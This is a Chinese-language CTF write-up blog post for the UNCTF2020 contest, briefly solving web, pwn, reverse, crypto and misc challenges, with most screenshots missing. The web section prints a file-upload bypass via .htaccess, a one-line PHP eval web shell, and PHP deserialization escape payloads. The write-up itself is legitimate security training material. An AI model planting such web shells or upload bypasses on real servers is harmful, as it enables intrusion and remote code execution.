【CTF】UNCTF Writeup by Satan9a
浏览 507 | 评论 1 | 字数 6570
Xunflash
2020年11月15日
  • 比赛:UNCTF2020校内赛

    ID:Satan9a

    xuxuan AN_666 Xunflash

    Web

    1.easy_ssrf

    请输入图片描述

    2.俄罗斯方块人大战奥特曼

    查看源代码,发现有一个压缩包

    请输入图片描述

    下载下来

    33

    发现有

    44

    打开即可得到flag

    55

    3.easy_upload

    解题过程:

    上传题,测试不能上传php,phtml等,发现数据库是apache,尝试上传.htaccess文件,文件内容

    plain
    AddType application/x-httpd-p\
    hp .jpg
    

    上传hp.jpg
    内容

    plain
    <?=eval($_POST[satan]);
    

    连接蚁剑得到flag

    4.easyunserialize

    解题过程:

    反序列化字符串逃逸,构造payload

    plain
    challengechallengechallengechallengechallengechallengechallengechallenge";s:8:"password";s:4:"easy"};;;
    

    得出flag

    5.ezphp

    解题过程:

    原题,构造payload

    plain
    data=a:2:{s:8:"username";b:1;s:8:"password";b:1;}
    

    得到flag

    Pwn

    1.YLBNB

    使用pwntools

    66

    Reverse

    1.recheckin

    解题过程:

    打开ida搜welcome,按f5

    77

    得到伪代码,可知与str2比较,双击跳转

    88

    双击,后面的按r转换成字符

    99

    Crypto

    1.wing

    解题过程:附件的图片是一些符号,一点都看不懂,提示说是office,于是打开office![图片]a

    里面的字体里有一个叫11a

    的字体,发现里面的字体正好是这些符号,于是一个个对比过去,把附件里的符号全部输入到office,然后转换为宋体12a13a

    得到flag

    2.鞍山大法官

    14a

    看到营养想到培根加密

    将o替换位A,t替换为B

    解密即可

    15a

    3.easy_rsa

    16

    17

    4.简单的RSA

    18

    得到d

    19

    20

    5.快乐数学

    第一小问找规律即可

    21

    222324

    第二小问

    25

    第三小问

    2627

    sqrt[2020]{2020!}-frac{1}{112}-frac{28pi}{3}

    md5加密即可

    28

    Misc

    1.mouse_click

    解题过程:

    下载脚本https://github.com/WangYihang/UsbMiceDataHacker,下载后放到wireshark根目录,附件也放进去,管理员运行cmd,cd到wireshark根目录,输入

    plain
    python2 UsbMiceDataHacker.py mouse_click.pcapng LEFT
    

    然后就自动绘制出了鼠标运行轨迹
    29

    得出flag

    2.倒影

    解题过程:

    010editor打开文件,底部有一串base64字符,解码后得到一串hex码,但是得不出东西,根据题目名称提示,将hex码倒序输出,再使用010editor生成文件得出压缩包,有密码,爆破六位数密码后得出flag

    3.你能破解我的密码吗

    解题过程:

    shadow是linux /etc/shadow文件,文本打开,有一行guguguguji30后面接了md5,根据shadow文件格式,md5解密结果123456即密码.

    4.阴阳人编码

    解题过程:打开文件,格式是一个没有见过的编码,但是很熟悉,和Ook编码很像,尝试一下,把“就这.”换成“Ook.”,“就这¿”换成“Ook?”,“不会吧!”换成“Ook!”。然后解密,得到flag! 31

    5.EZIMAGE

    解题过程:

    使用imgmagick里面的montage拼图

    plain
    montage unctf*.png -tile 15*15-geometry +0+0 flag.png
    

    然后得到这个
    32

    然后gaps拼图

    plain
    gaps --image=flag.png --size=60 --save
    

    得到flag!33

    6.零

    解题过程:打开txt,是一段字母,尝试词频分析没有用,全选复制到wps,发现有多处留白,百度得知是零宽度字符串隐写,http://330k.github.io/misc_tools/unicode_steganography.html

    进入这个网站,解密得到flag34

    7.网络深处1

    解题过程:解压文件,有一段拨号音,不知道要干什么,尝试解压里面的压缩包,发现要密码,猜测电话号码就是密码,11位数字密码爆破35

    解压压缩包,里面有一段音频,Audacity打开36

    看不出什么东西,查看频谱图37

    https://tuppers-formula.ovh/

    进入网站,把长串数字复制粘贴38

    得到flag

    8.baba_is_you

    39

    有一个b站地址

    flag在评论区

    40

    9.撕毁的二维码

    41

    10.被删除的flag

    放BT5里

    cat flag

    42

    直接得到flag

    43

    11.爷的历险记

    44

    解摩丝码

    拿到屠龙刀

    45

    打了第一个boss

    46

    47

    48

    做异或 开第二个宝箱

    49

    购买hint2

    修改hint2提示的那个文件

    50

    打倒第三个boss

    拿到flag

    51

    12.躲猫猫

    后缀改成zip解压, 打开/xl/sharedstring.xml

    里面一串base64解码即可52

    13.YLB's CAPTCHA - 签到题

    阴间签到,验证码纯眼看,连对十次就可以得到flag了。

    本文作者:Xunflash
    本文链接:http://xunflash.top/index.php/archives/unctf2020.html
    最后修改时间:2021-04-01 19:41:08
    本站未注明转载的文章均为原创,并采用 CC BY-NC-SA 4.0 授权协议,转载请注明来源,谢谢!
    评论
    球球给菜鸡站长评个论8
    textsms
    支持 Markdown 语法
    email
    link
    评论列表
    已有 1 条评论
    2020-12-14 02:07
    这篇文章由于图太多,测试一下自己的图床,没想到这么慢,明年三月的样子我满18,备案完就把小站转到服务器上面 🙏 这段时间大家先凑合看一看8